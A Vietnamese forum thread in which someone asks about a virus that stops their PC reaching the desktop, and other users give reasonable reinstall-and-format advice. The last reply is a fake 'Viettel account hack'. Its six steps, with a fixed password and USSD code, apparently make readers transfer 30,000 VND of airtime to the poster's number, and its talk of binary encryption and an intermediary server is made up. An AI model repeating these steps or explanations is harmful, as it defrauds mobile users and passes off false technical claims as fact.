Máy tính nhiễm Virus không vào được Desktop ?

Huhu các bác ơi cứu em với!!!. máy em bị nhiễm virus gì mà giờ khởi động máy không vào được Desktop nữa. Em nhờ bạn e thử rất nhiều Soft diệt Virus mà không đc. có Avira thì diệt hết nhưng cứ kick vào tài liệu cũ lại bị nhiễm lại. Lần nào khởi động máy cũng có màn hình xanh lè và mỗi con chuột. lại phải Ctrl Alt Del rồi New task rồi explorer mới vào được. huhu. em chán lắm rùi. các bác giúp em với!!!!
thuy linh
thuy linh
Trả lời 14 năm trước
Nếu desktop trắng thì virus ăn mất file explorer.exe rồi. dùng soft nào đó quét lại xem. ko thì cài lại win, tạo sẵn file ghost cho an tâm.
Trả lời 14 năm trước
Bạn format ổ đĩa rùi cài lại win nha.
thuylynh
thuylynh
Trả lời 14 năm trước
máy của bạn bị virut rồi.bây giờ bạn có cài lại win mới nhiều lần cũng vẫn bị .các phần mềm diệt virut tốt nhất cũng không diệt chúng được vì máy đã bị nhiễm rồi .Nếu mà có diệt được thì win của bạn không chạy được.trước tiên bạn phải lấy hết dữ liệu trong máy chép ra đĩa.format toàn bộ đĩa cứng như vậy thì mới làm sạch hết virut .cài hệ điều hành mới cùng với phần mềm diệt virut.xong thì mới chép dữ liệu vào máy.chúc bạn thành công!
cuoisaochoi87
cuoisaochoi87
Trả lời 12 năm trước

Tôi :
Họ tên: Hoàng Kỳ Anh.
Nghề nghiệp : Cựu Sinh viên Ðại Học Bách Khoa-BKA.

Tôi không dám nhận mình là một sinh viên ưu tú, nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng. Chắc các bạn cũng biết tới diễn đàn HAVonline - diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn. Với những kinh nghiệm mà tôi đã có cùng với những cộng sự, những người bạn còn hơn cả anh chị em trong nhà của tôi, hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác, đơn giản, dễ thực hiện và xác suất thành công rất cao:

Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

1 -Một sim Viettel (trả trước) hoạt động trên 481 ngày (hơn 16 tháng).Tại sao phải cần vậy? Vì chỉ có những sim hoạt dộng trên 16 tháng mới được Viettel đưa vào mã bảo vệ tài khoản tiền trong sim ( 15 tháng chưa được đâu các bạn) trên server Viettel quản lí.

2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có). Tại sao phải cần vậy? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.

3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900, nhánh phím số 3 và làm theo hướng dẫn.. Người ta sẽ yêu cầu bạn nhập mã số bí mật: các bạn nhập mật khẩu cũ của các bạn vào; người ta yêu cầu bạn nhập mã số bí mật mới: các bạn nhập 10101011 và nhập lại 10101011 lần nữa. Điều quan trọng nằm ở bước này. Các bạn phải đổi mật khẩu chuyển tiền thành dãy : 10101011, đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy? Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lí. Ðiều này rất quan trọng.
(Viettel tưởng mình là thông minh khi mã hóa bằng hệ nhị phân)

4 -Tài khoản trong sim của bạn phải có nhiều hơn 31999 VNĐ. Tại sao à? Viettel nó chỉ quản lý chặt cho các sim có TK >31999VNĐ, và cho các sim này nhiều ưu đãi hơn.

5 -Các bạn làm theo cú pháp như sau: *136* mật khẩu Server *mã PIN *mã PUK# (có thể gọi đây là cú pháp “nhận tiền”)
Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sđt của bạn trên Server), tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):
+ mật khẩu Server: 10101011
+ mã PIN : 841698913342
+ mã PUK: 30000
Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sđt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sđt người gửi sẽ tự động được cộng thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính), thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lí là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di động, chẳng hạn như I-Share, hiện trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút, sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 100000 vnđ. (đã Test)